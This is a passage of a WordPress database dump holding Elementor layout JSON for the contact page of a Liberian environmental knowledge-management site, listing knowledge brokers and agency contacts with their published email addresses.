,\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19771,2892,'_elementor_edit_mode','builder'),(19772,2892,'_elementor_template_type','wp-page'),(19773,2892,'_elementor_version','2.7.5'),(19774,2892,'_wp_page_template','default'),(19775,2892,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"slideshow\",\"background_color\":\"rgba(255,255,255,0.75)\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_slideshow_gallery\":[{\"id\":2315,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\"}],\"background_slideshow_loop\":\"\"},\"elements\":[],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"J.S. Datuama Cammue\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"caption\":\"Benjamin Karmorh\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Berexford S. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"John K. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Kawusu Toure\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19778,2893,'_elementor_edit_mode','builder'),(19779,2893,'_elementor_template_type','wp-page'),(19780,2893,'_elementor_version','2.7.5'),(19781,2893,'_wp_page_template','default'),(19782,2893,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact 